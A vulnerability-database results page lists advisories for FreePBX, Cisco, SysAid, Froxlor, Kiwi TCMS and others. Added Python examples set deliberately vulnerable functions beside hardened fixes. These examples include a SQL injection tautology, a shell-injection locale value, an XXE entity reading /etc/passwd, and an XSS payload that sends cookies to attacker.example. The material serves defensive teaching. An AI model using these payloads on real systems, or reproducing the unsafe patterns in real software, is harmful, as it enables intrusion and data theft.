Lucene search

86 matches found

Positive Technologies
added 2025/12/16 12:00 a.m. · 2 views

PT-2025-51353

Name of the Vulnerable Software and Affected Versions: FreePBX tts module versions prior to 16.0.5; FreePBX tts module versions prior to 17.0.5. Description: The Text to Speech (tts) module for FreePBX, a web-based graphical user interface for Asterisk, contains a SQL injection flaw. Authenticated user...

CVSS 8.6 · AI score 7.9 · EPSS 0.00106
Exploits 0 · References 6
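The entry above only says that an authenticated user can inject SQL through the tts module. As an added example (not FreePBX code, and not the module's actual query), the block below shows the two shapes such a lookup can take: a name spliced into the SQL text beside the parameterised form, run against a constructed three-row SQLite table so the difference is observable.

```python
"""SQL injection, vulnerable vs parameterised (illustrative, not FreePBX code).

A constructed three-row table stands in for a module's settings store; the
only thing under test is how the caller-supplied name reaches the query.
"""
import sqlite3

# Constructed sample rows; they do not come from any real tts table.
SAMPLE_ROWS = [
    ("greeting", "Welcome to support"),
    ("afterhours", "We are closed"),
    ("secret_note", "internal only"),
]

# A classic tautology payload: closes the quoted literal, then ORs in a true clause.
PAYLOAD = "x' OR '1'='1"


def make_db():
    """Fresh in-memory database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tts (name TEXT PRIMARY KEY, text TEXT)")
    conn.executemany("INSERT INTO tts VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_unsafe(conn, name):
    """Vulnerable pattern: the user value is spliced into the SQL text, so a
    quote in the value changes the structure of the statement."""
    sql = "SELECT name, text FROM tts WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """Hardened form: the value is bound as a parameter; the driver never
    interprets it as SQL, so the payload simply fails to match a name."""
    return conn.execute(
        "SELECT name, text FROM tts WHERE name = ?", (name,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("unsafe:", lookup_unsafe(db, PAYLOAD))
    print("safe:  ", lookup_safe(db, PAYLOAD))
```

With the payload, the spliced query returns every row (including the "secret_note" row the caller never named), while the parameterised query returns nothing. The same rule applies to the ORDER BY, LIMIT and table-name positions, which cannot be bound as parameters and need an allowlist instead.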
Tenable Nessus
added 2025/10/28 12:00 a.m. · 5 views

Microsoft Endpoint Configuration Manager (CVE-2025-59501)

The Microsoft Endpoint Configuration Manager application installed on the remote host is missing a security hotfix documented in the vendor advisory. It is, therefore, affected by an elevation of privilege vulnerability. An attacker could exploit this vulnerability by modifying the user principal...

CVSS 4.8 · AI score 5.9 · EPSS 0.00122
Exploits 0 · References 4
EUVD
added 2025/10/03 8:07 p.m. · 2 views

EUVD-2025-6845

Malicious code in bioql PyPI...

CVSS 6.5 · AI score 6.6 · EPSS 0.00128
Exploits 1 · References 2
EUVD
added 2025/10/03 8:07 p.m. · 2 views

EUVD-2025-12619

Malicious code in bioql PyPI...

CVSS 4.3 · AI score 8.7 · EPSS 0.00073
Exploits 0 · References 2
Cvelist
added 2025/09/15 9:00 p.m. · 5 views

CVE-2025-55211 FreePBX Post-Authenticated Command Injection

FreePBX is an open-source web-based graphical user interface. From 17.0.19.11 to before 17.0.21, authenticated users of the Administrator Control Panel (ACP) can run arbitrary shell commands by maliciously changing the language of the framework module. This vulnerability is fixed in 17.0.21...

CVSS 8.7 · EPSS 0.00085
Exploits 0 · References 1
CVE
added 2025/09/15 9:00 p.m. · 10 views

CVE-2025-55211

CVE-2025-55211 affects FreePBX from 17.0.19.11 before 17.0.21 (fixed in 17.0.21), where authenticated users of the Administrator Control Panel could execute arbitrary shell commands by maliciously changing the language setting of the framework module. Root cause: language manipulation in the framework module allows command ...

CVSS 8.8 · AI score 6.6 · EPSS 0.00085
Exploits 0 · References 1 · Affected Software 1
OSV
added 2025/09/15 9:00 p.m. · 3 views

CVE-2025-55211 FreePBX Post-Authenticated Command Injection

FreePBX is an open-source web-based graphical user interface. From 17.0.19.11 to before 17.0.21, authenticated users of the Administrator Control Panel (ACP) can run arbitrary shell commands by maliciously changing the language of the framework module. This vulnerability is fixed in 17.0.21...

CVSS 8.7 · AI score 7.1 · EPSS 0.00085
Exploits 0 · References 3
Positive Technologies
added 2025/09/15 12:00 a.m. · 4 views

PT-2025-37763

Name of the Vulnerable Software and Affected Versions: FreePBX versions 17.0.19.11 through 17.0.20. Description: FreePBX is a web-based graphical user interface. Authenticated users of the Administrator Control Panel (ACP) can execute arbitrary shell commands by manipulating the framework module's...

CVSS 8.7 · AI score 7.1 · EPSS 0.00085
Exploits 0 · References 3
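The four CVE-2025-55211 entries above all describe the same bug class: a language setting that ends up inside a shell command. As an added example (not FreePBX code; the locale grammar, the `locale` command and the function names are assumptions for this illustration), the block contrasts a value spliced into a command string with an allowlist check followed by an argv list that never touches a shell.

```python
"""Language/locale change: shell-spliced value vs validated argv
(illustrative; not FreePBX code; the locale grammar and command are assumptions)."""
import re
import subprocess

# Accept only identifiers shaped like "en", "pt_BR" or "en_US.UTF-8".
LOCALE_RE = re.compile(r"[a-z]{2,3}(_[A-Z]{2})?(\.[A-Za-z0-9-]+)?")


def build_locale_command_unsafe(lang):
    """Vulnerable pattern: the value becomes part of a shell command line, so
    shell metacharacters in it (;, |, $(...), backticks) run as commands."""
    return "LANG=" + lang + " /usr/bin/env locale"


def validate_locale(lang):
    """Allowlist check; anything outside the grammar is rejected outright."""
    if not isinstance(lang, str) or not LOCALE_RE.fullmatch(lang):
        raise ValueError("locale identifier rejected: %r" % (lang,))
    return lang


def build_locale_command_safe(lang):
    """Hardened form: validated value passed as one argv element, no shell, so
    metacharacters would be literal characters even if validation were looser."""
    return ["/usr/bin/env", "LANG=" + validate_locale(lang), "locale"]


def run_locale(lang):
    """Executes the hardened command; returns the process exit status."""
    proc = subprocess.run(build_locale_command_safe(lang),
                          capture_output=True, text=True, check=False)
    return proc.returncode


if __name__ == "__main__":
    hostile = "en_US; id > /tmp/pwned"
    print(build_locale_command_unsafe(hostile))   # one string a shell would split at ';'
    try:
        build_locale_command_safe(hostile)
    except ValueError as exc:
        print("rejected:", exc)
```

The allowlist is the primary control and the argv form the second; either alone closes this particular payload, but only the pair also covers values that are later written into a config file or passed to another interpreter.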
RedhatCVE
added 2025/05/21 9:19 p.m. · 5 views

CVE-2009-2371

Advanced Forum 6.x before 6.x-1.1, a module for Drupal, does not prevent users from modifying user signatures after the associated comment format has been changed to an administrator-controlled input format, which allows remote authenticated users to inject arbitrary web script, HTML, and possibl...

CVSS 6.5 · AI score 7.0 · EPSS 0.00642
Exploits 0 · References 1
Hacker One
added 2025/04/27 1:35 p.m. · 1027 views

Dust: Privilege Persistence via Cloned Agent

The vulnerability allowed a member to clone an agent managed by the admin by modifying the agent's unique identifier (sid). This resulted in the admin being unable to effectively disable the agent, as the cloned version could still be used by the member even after the original agent was disabled...

AI score 6.8
Exploits 0
RedhatCVE
added 2025/02/06 2:30 a.m. · 9 views

CVE-2025-20156

A vulnerability in the REST API of Cisco Meeting Management could allow a remote, authenticated attacker with low privileges to elevate privileges to administrator on an affected device. This vulnerability exists because proper authorization is not enforced upon REST API users. An attacker could...

CVSS 9.9 · AI score 6.9 · EPSS 0.01481
Exploits 0 · References 1
Cvelist
added 2025/01/22 4:21 p.m. · 33 views

CVE-2025-20156 Cisco Meeting Management Client-Server Privilege Escalation Vulnerability

A vulnerability in the REST API of Cisco Meeting Management could allow a remote, authenticated attacker with low privileges to elevate privileges to administrator on an affected device. This vulnerability exists because proper authorization is not enforced upon REST API users. An attacker could...

CVSS 9.9 · EPSS 0.01481
Exploits 0 · References 3
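The two Cisco Meeting Management entries above, and the Dust "cloned agent" report earlier on this page, share one root cause: the request is authenticated, but nobody checks whether the caller is allowed to perform that operation on that object. As an added example (not Cisco or Dust code; the user store, role names and route are constructed), the block shows a role-changing operation with no authorization check beside the same operation behind an explicit server-side role check.

```python
"""Server-side authorization for a privileged REST operation (illustrative;
not Cisco or Dust code; users, roles and the operation are constructed)."""
from functools import wraps


class Forbidden(Exception):
    """Raised in place of an HTTP 403."""


# Constructed user store; the role is server-side state, never read from the request.
USERS = {}


def reset_users():
    USERS.clear()
    USERS.update({"alice": {"role": "admin"}, "bob": {"role": "user"}})
    return dict(USERS)


def require_role(role):
    """Decorator: the caller's *stored* role must equal `role`, else 403."""
    def decorator(fn):
        @wraps(fn)
        def wrapper(caller, *args, **kwargs):
            if USERS.get(caller, {}).get("role") != role:
                raise Forbidden("%s is not %s" % (caller, role))
            return fn(caller, *args, **kwargs)
        return wrapper
    return decorator


def set_role_unchecked(caller, target, new_role):
    """Vulnerable pattern: authentication only. Any logged-in user can change
    any role, including their own, because nothing looks at who is calling."""
    USERS[target]["role"] = new_role
    return USERS[target]["role"]


@require_role("admin")
def set_role(caller, target, new_role):
    """Hardened form: the same operation behind an explicit authorization check."""
    USERS[target]["role"] = new_role
    return USERS[target]["role"]


reset_users()
```

The check is keyed on the caller's identity from the session, not on a role or identifier carried in the request body or URL; an identifier the client can rewrite (the Dust report's sid) is exactly what must not decide access. In a real API the same decorator pattern also belongs on every object-level route, with an ownership check against the target object, not just on the role-changing one.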
Positive Technologies
added 2025/01/06 12:00 a.m. · 3 views

PT-2025-20233

Name of the Vulnerable Software and Affected Versions: SysAid On-Prem versions 23.3.40 and earlier. Description: SysAid On-Prem software is affected by an unauthenticated XML External Entity (XXE) issue in the lshw processing functionality. Exploitation of this issue may allow a remote attacker to tak...

CVSS 9.8 · AI score 8.7 · EPSS 0.23107
Exploits 1 · References 24
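The SysAid entry above describes an XXE in code that parses an lshw-style XML report submitted by an unauthenticated client. As an added example (not SysAid code; the sample documents are constructed and the element names are only lshw-like), the block refuses any DOCTYPE or ENTITY declaration before the bytes reach a parser, which is the check a practitioner would want regardless of which XML library sits behind it, since libraries differ in whether they resolve external entities by default.

```python
"""Reject DOCTYPE/ENTITY before parsing untrusted XML (illustrative; not
SysAid code; the lshw-style sample documents are constructed)."""
import re
import xml.etree.ElementTree as ET

# Any DTD is refused: external entities, parameter entities and entity
# expansion bombs all need a DOCTYPE to be declared.
DTD_RE = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


class UnsafeXML(ValueError):
    pass


def parse_untrusted_xml(data):
    """Parse bytes from an untrusted client, refusing any DTD up front so the
    check holds no matter how the parser behind it treats entities."""
    if not isinstance(data, bytes):
        data = data.encode("utf-8")
    if DTD_RE.search(data):
        raise UnsafeXML("DOCTYPE/ENTITY declarations are not accepted")
    return ET.fromstring(data)


def first_description(data):
    """Text of the first <node>/<description>, or None if absent."""
    root = parse_untrusted_xml(data)
    return root.findtext("./node/description")


# Constructed samples: a benign lshw-like report and one carrying an external entity.
SAMPLE_OK = (b"<?xml version='1.0'?><list><node id='system' class='system'>"
             b"<description>Desktop Computer</description></node></list>")
SAMPLE_XXE = (b"<?xml version='1.0'?>"
              b"<!DOCTYPE list [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>"
              b"<list><node><description>&xxe;</description></node></list>")

if __name__ == "__main__":
    print(first_description(SAMPLE_OK))
    try:
        first_description(SAMPLE_XXE)
    except UnsafeXML as exc:
        print("rejected:", exc)
```

The pre-check is deliberately coarse: a document whose CDATA happens to contain the text `<!DOCTYPE` is also rejected, which fails closed. For an endpoint that legitimately needs a DTD, the alternative is a parser configured with external entity resolution and network access disabled, plus an input size limit, since the same code path is where the unauthenticated exposure lives.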
CVE
added 2024/11/11 7:46 p.m. · 43 views

CVE-2024-51484

CVE-2024-51484 concerns Ampache, a web-based audio/video streaming app. The issue is in how the platform validates CSRF tokens during activation/deactivation of controllers: the token parsing/validation path does not properly secure these state-changing requests, enabling CSRF-style abuse to togg...

CVSS 8.1 · AI score 8.0 · EPSS 0.00181
Exploits 1 · References 1 · Affected Software 1
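The Ampache entry above points at the token parsing and validation path for a state-changing request. As an added example (not Ampache code; the controller registry, session identifiers and function names are constructed), the block issues a token bound to the session with an HMAC, verifies it in constant time, and fails closed on a missing, empty or malformed token, which is the case a validation path most often gets wrong.

```python
"""CSRF token bound to the session and checked in constant time (illustrative;
not Ampache code; the controller registry and names are constructed)."""
import hashlib
import hmac
import os
import secrets

# Server-side key; constructed here, would come from configuration in practice.
SECRET_KEY = os.urandom(32)


def issue_csrf_token(session_id):
    """Token is nonce.mac with mac = HMAC-SHA256(key, session_id:nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SECRET_KEY, ("%s:%s" % (session_id, nonce)).encode(),
                   hashlib.sha256).hexdigest()
    return nonce + "." + mac


def verify_csrf_token(session_id, token):
    """Fail closed on anything malformed; compare MACs in constant time."""
    if not isinstance(token, str) or token.count(".") != 1:
        return False
    nonce, mac = token.split(".")
    if not nonce or not mac:
        return False
    expected = hmac.new(SECRET_KEY, ("%s:%s" % (session_id, nonce)).encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


# Constructed controller registry: name -> enabled.
CONTROLLERS = {"catalog": True, "upload": False}


def toggle_controller(session_id, token, name):
    """State-changing request: honoured only with a valid token for this session."""
    if not verify_csrf_token(session_id, token):
        return False
    CONTROLLERS[name] = not CONTROLLERS[name]
    return True


if __name__ == "__main__":
    tok = issue_csrf_token("sess-1")
    print("own session:", toggle_controller("sess-1", tok, "upload"))
    print("other session:", toggle_controller("sess-2", tok, "upload"))
    print("no token:", toggle_controller("sess-1", "", "upload"))
```

Binding the MAC to the session id means a token stolen or minted under another session does not verify, and because the server derives the expected value rather than storing each token, there is no per-token state to skip when the parameter is absent. The request should additionally be a POST, since a GET that changes state is reachable from a plain link.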
OSV
added 2024/05/10 3:29 p.m. · 24 views

GHSA-X525-54HF-XR53 Blind XSS Leading to Froxlor Application Compromise

Description: A Stored Blind Cross-Site Scripting (XSS) vulnerability has been identified in the Failed Login Attempts Logging Feature of the Froxlor Application. Stored Blind XSS occurs when user input is not properly sanitized and is stored on the server, allowing an attacker to inject malicious...

CVSS 9.6 · AI score 8.6 · EPSS 0.01271
Exploits 2 · References 4
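The Froxlor entry above is the textbook "blind" case: the value is written by an unauthenticated login attempt and read much later by an administrator. As an added example (not Froxlor code; the log store, the page and the payload are constructed), the block records a failed login verbatim and then renders the log two ways, so the point lands on the output side: storage is not where escaping belongs, the HTML rendering is.

```python
"""Escape attacker-supplied fields when a log is rendered into an admin page
(illustrative; not Froxlor code; the log store and page are constructed)."""
import html

FAILED_LOGINS = []


def record_failed_login(username, remote_ip):
    """Store exactly what was submitted. Nothing here is trusted later; the
    raw value is kept so the admin sees what was actually tried."""
    FAILED_LOGINS.append({"user": username, "ip": remote_ip})
    return len(FAILED_LOGINS)


def render_row_unsafe(entry):
    """Vulnerable pattern: stored values dropped straight into HTML, so a
    payload submitted at login time runs in the administrator's browser."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (entry["user"], entry["ip"])


def render_row_safe(entry):
    """Hardened form: every untrusted value escaped for an HTML text context
    (quote=True also neutralises quotes, so the same helper is safe in attributes)."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (
        html.escape(entry["user"], quote=True),
        html.escape(entry["ip"], quote=True),
    )


def render_log_page(rows=None, safe=True):
    """The admin-facing table; `safe=False` exists only to show the contrast."""
    rows = FAILED_LOGINS if rows is None else rows
    render = render_row_safe if safe else render_row_unsafe
    return "<table>" + "".join(render(e) for e in rows) + "</table>"


# Constructed payload of the kind a blind XSS probe would submit as a username.
PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'

if __name__ == "__main__":
    record_failed_login(PAYLOAD, "203.0.113.7")
    print(render_log_page(safe=False))
    print(render_log_page())
```

A template engine with auto-escaping on by default gives the same result without remembering to call the helper; the failure mode to look for in review is a raw-output filter (or a string concatenation path that bypasses the engine) on exactly these low-traffic admin pages. The remote address should be taken from the connection, not from a client header, for the same reason.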
Prion
added 2023/12/15 4:15 p.m. · 19 views

Input validation

An improper certificate validation issue in Smartcard authentication in GitLab EE affecting all versions from 11.6 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows an attacker to authenticate as another user given their public key if they use Smartcard authentication...

CVSS 5.1 · AI score 6.8 · EPSS 0.0003
Exploits 0 · References 1 · Affected Software 1
Github Security Blog
added 2023/04/24 10:44 p.m. · 25 views

Unrestricted file upload in kiwi TCMS

Impact Kiwi TCMS allows users to upload attachments to test plans, test cases, etc. In earlier versions there is no control over what kinds of files can be uploaded. Thus a malicious actor may upload an .exe file or a file containing embedded JavaScript and trick others into clicking on these fil...

CVSS 9.0 · AI score 6.2 · EPSS 0.00694
Exploits 1 · References 6 · Affected Software 1
OSV
added 2023/04/24 10:44 p.m. · 18 views

GHSA-FWCF-753V-FGCJ Unrestricted file upload in kiwi TCMS

Impact Kiwi TCMS allows users to upload attachments to test plans, test cases, etc. In earlier versions there is no control over what kinds of files can be uploaded. Thus a malicious actor may upload an .exe file or a file containing embedded JavaScript and trick others into clicking on these fil...

CVSS 7.7 · AI score 8.8 · EPSS 0.00694
Exploits 1 · References 6
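Both Kiwi TCMS entries above describe an attachment feature with no control over file type, so an .exe or a file with embedded script can be uploaded and served to other users. As an added example (not Kiwi TCMS code; the allowed types, size limit and headers are assumptions chosen for the illustration), the block validates an upload by extension allowlist and content signature, strips any path component from the name, and returns the response headers that keep even a misclassified file from executing as a page.

```python
"""Upload allowlist by extension, content sniffing and download headers
(illustrative; not Kiwi TCMS code; allowed types and limits are assumptions)."""
import os

# Extension -> (accepted leading bytes, content type). Empty tuple = no signature.
ALLOWED_TYPES = {
    ".png": ((b"\x89PNG\r\n\x1a\n",), "image/png"),
    ".jpg": ((b"\xff\xd8\xff",), "image/jpeg"),
    ".pdf": ((b"%PDF-",), "application/pdf"),
    ".txt": ((), "text/plain"),
}
MAX_BYTES = 5 * 1024 * 1024


class UploadRejected(ValueError):
    pass


def validate_upload(filename, content):
    """Return (safe_name, content_type) or raise UploadRejected."""
    # Drop any directory part the client sent, on either separator.
    name = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected("extension not allowed: %r" % ext)
    if len(content) > MAX_BYTES:
        raise UploadRejected("attachment too large")
    signatures, ctype = ALLOWED_TYPES[ext]
    if signatures and not any(content.startswith(s) for s in signatures):
        raise UploadRejected("content does not match %s" % ext)
    if ext == ".txt" and b"<" in content:
        # A text attachment with markup is what a browser would sniff as HTML.
        raise UploadRejected("markup in text attachment")
    return name, ctype


def download_headers(name, ctype):
    """Serve attachments as downloads with sniffing off and scripts blocked:
    even a file that slipped past validation cannot run as a page."""
    return {
        "Content-Type": ctype,
        "Content-Disposition": 'attachment; filename="%s"' % name.replace('"', ""),
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


if __name__ == "__main__":
    print(validate_upload("shot.png", b"\x89PNG\r\n\x1a\n" + b"\0" * 16))
    for fname, body in (("setup.exe", b"MZ\x90\x00"), ("logo.svg", b"<svg onload=alert(1)>")):
        try:
            validate_upload(fname, body)
        except UploadRejected as exc:
            print(fname, "->", exc)
```

SVG is left off the allowlist on purpose: it is an image format that can carry script, so allowing it means serving it only under the download headers above or from a separate origin. Serving attachments from a distinct domain is the stronger fix, because it takes the application's cookies out of reach of anything that does render.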
Prion
added 2023/04/14 3:15 p.m. · 16 views

Design/Logic Flaw

SmartPTT SCADA 1.1.0.0 allows remote code execution when the attacker has administrator privileges by writing a malicious C script and executing it on the server via server settings in the administrator control panel on port 8101, by default...

CVSS 5.8 · AI score 7.3 · EPSS 0.336
Exploits 2 · References 2 · Affected Software 1